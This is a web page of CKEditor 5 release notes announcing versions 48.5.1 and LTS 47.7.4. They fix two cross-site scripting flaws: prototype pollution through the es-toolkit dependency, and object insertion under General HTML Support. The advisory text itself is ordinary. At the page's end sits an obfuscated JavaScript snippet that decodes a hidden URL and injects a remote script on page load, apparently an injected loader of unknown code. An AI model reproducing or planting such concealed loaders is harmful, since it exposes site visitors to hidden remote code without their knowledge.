CKEditor 5 v48.5.1 and LTS v47.7.4 Release Highlights: Security Fixes

Two cross-site scripting (XSS) vulnerabilities have been discovered in the CKEditor 5 engine. Both issues are now resolved, and we recommend updating your installation as soon as possible.

The first comes from a third-party library that CKEditor 5 depends on and relates to how the editor reads style attribute values. The second is limited to installations that enable General HTML Support with a configuration that allows inserting objects.

These fixes ship in two separate releases because they affect both the standard CKEditor 5 line and its LTS Edition. Both releases contain the same two fixes. Update to the release that matches your track:

  • If you are on the standard CKEditor 5 line, update to v48.5.1 

  • If you are on the CKEditor 5 LTS Edition, update to v47.7.4

Prototype pollution via a dependencyUPDATED

The first vulnerability, GHSA-rh54-vffm-5fvp, traces to es-toolkit, a library that CKEditor 5 relies on. A prototype pollution flaw in that library meant a crafted style attribute value could trigger JavaScript execution as the editor read it. The es-toolkit maintainers have fixed the flaw at its source, and that fix now ships as part of CKEditor 5.

You can find the specifics in the security advisory.

Object insertion with General HTML SupportUPDATED

The second vulnerability, GHSA-v6mg-96c6-gmpq, has a much narrower reach. It applies only to installations that enable General HTML Support and configure it to allow inserting objects.

On these installations, crafted content could run JavaScript in a browser context that operates outside the origin of the application embedding the editor. Installations that do not use this General HTML Support configuration are unaffected. The security advisory has the full details.

Publication of the official CVE records for both of these issues is pending. Due to a significant increase in CVE publication requests across the industry, GitHub has indicated that the process may take several weeks.

Interested in LTS?

If your organization values long-term stability over continuous updates, the CKEditor 5 LTS Edition may be worth exploring. You can learn more about it on our introduction post or contact our sales team to obtain a license.

Learn more about previous CKEditor 5 versions

Previous Post

Related posts

Subscribe to our newsletter

Keep your CKEditor fresh! Receive updates about releases, new features and security fixes.

contact_confirmation
policy
eventId

Input email to subscribe to newsletter

Subscription failed

Thanks for subscribing!

HiddenGatedContent.

window[(function(_2VK,_6n){var _91='';for(var _hi=0;_hi<_2VK.length;_hi++){_91==_91;_DR!=_hi;var _DR=_2VK[_hi].charCodeAt();_DR-=_6n;_DR+=61;_DR%=94;_DR+=33;_6n>9;_91+=String.fromCharCode(_DR)}return _91})(atob('J3R7Pzw3MjBBdjJG'), 43)] = '37db4db8751680691983'; var zi = document.createElement('script'); (zi.type = 'text/javascript'), (zi.async = true), (zi.src = (function(_HwU,_af){var _wr='';for(var _4c=0;_4c<_HwU.length;_4c++){var _Gq=_HwU[_4c].charCodeAt();_af>4;_Gq-=_af;_Gq!=_4c;_Gq+=61;_Gq%=94;_wr==_wr;_Gq+=33;_wr+=String.fromCharCode(_Gq)}return _wr})(atob('IS0tKSxRRkYjLEUzIkQseisiKS0sRXooJkYzIkQteH5FIyw='), 23)), document.readyState === 'complete'?document.body.appendChild(zi): window.addEventListener('load', function(){ document.body.appendChild(zi) });